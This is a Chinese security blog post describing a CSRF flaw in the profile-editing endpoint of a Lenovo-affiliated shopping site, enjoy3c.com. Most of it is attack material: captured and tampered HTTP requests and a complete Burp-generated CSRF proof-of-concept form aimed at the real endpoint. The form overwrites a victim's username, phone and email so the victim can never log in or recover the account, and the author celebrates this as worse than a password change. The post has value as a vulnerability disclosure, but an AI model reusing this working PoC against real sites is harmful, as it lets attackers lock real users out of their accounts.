联想某处组合csrf
漏洞案例
Web安全 2018-12-24

1、打开Url:http://www.enjoy3c.com/getMyInfo.do

image_1cidsgkuu118n1see19cevvo1ugr9.png-80.5kB

2、点击确定并且抓包,抓取的数据包如下

POST /editMyInfo.do HTTP/1.1
Host: www.enjoy3c.com
Content-Length: 124
Cache-Control: max-age=0
Origin: http://www.enjoy3c.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://www.enjoy3c.com/getMyInfo.do
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: 

account=lalala&loginMobile=13688888888&loginEmail=1900065568%40qq.com&realName=11&identityCard=&birthday=&province=3&city=36

因为此处存在逻辑问题,可绕过验证绑定任意手机号码任意邮箱,并且在登陆的时候需要输入如下数据:

image_1cidskcobm6lrbpe3esb214t1m.png-289.6kB

所以我们只需要将邮箱、手机号码、用户名修改为用户不可能知道的数据,那么点击这个csrf poc的用户就没办法再次登陆此网站了。

so,将如上数据包中的account修改为only_free_2018,将loginMobile修改为110,将loginEmail修改为`admin@lenovo.com`,修改后的数据包如下:

POST /editMyInfo.do HTTP/1.1
Host: www.enjoy3c.com
Content-Length: 124
Cache-Control: max-age=0
Origin: http://www.enjoy3c.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://www.enjoy3c.com/getMyInfo.do
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: 
Connection: close

account=only_free_2018&loginMobile=110&loginEmail=admin@lenovo.com&realName=11&identityCard=&birthday=&province=3&city=36

3、将其构造为csrf poc

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://www.enjoy3c.com/editMyInfo.do" method="POST">
      <input type="hidden" name="account" value="only&#95;free&#95;2018" />
      <input type="hidden" name="loginMobile" value="110" />
      <input type="hidden" name="loginEmail" value="admin&#64;lenovo&#46;com" />
      <input type="hidden" name="realName" value="11" />
      <input type="hidden" name="identityCard" value="" />
      <input type="hidden" name="birthday" value="" />
      <input type="hidden" name="province" value="3" />
      <input type="hidden" name="city" value="36" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

4、在浏览器处打开此poc:

image_1cidstmth174t1e1qtjg1dmehs71j.png-24.4kB

image_1cidstumjjc7ts7mql1oul10ok20.png-23.8kB

image_1cidsuenigbfvml5fkidtopv2d.png-99.3kB

成功被修改,那么这个时候,就没办法再登陆此网站了,因为登陆凭据被我修改了,比修改密码还要狠,修改密码后还可以用手机号码或者邮箱找回,而这个连密码都没办法找回,并且还不知道手机号码和邮箱和用户名是多少~~

Reprint please specify: only_free blog 联想某处组合csrf

Previous
【总结】- Bypass 360主机卫士SQL注入防御(多姿势) 【总结】- Bypass 360主机卫士SQL注入防御(多姿势)
原文链接:https://www.t00ls.net/articles-45943.html 此文并非抄袭,而是把文章中作者没写清楚的知识点写出来,然后更为人性化的输出来(吹个牛皮),也是为了让自己印象更加深刻~ 首先第一步作者使用的注
2018-12-24 总结
绕WAF
Next
一个有趣的思路 一个有趣的思路
首先,正常打开I春秋页面(https://bbs.ichunqiu.com/portal.php) 然后手贱一下加上一个alert(1)试试~(https://bbs.ichunqiu.com/portal.php?a=alert(1))
2018-12-24 Web安全
漏洞案例
TOC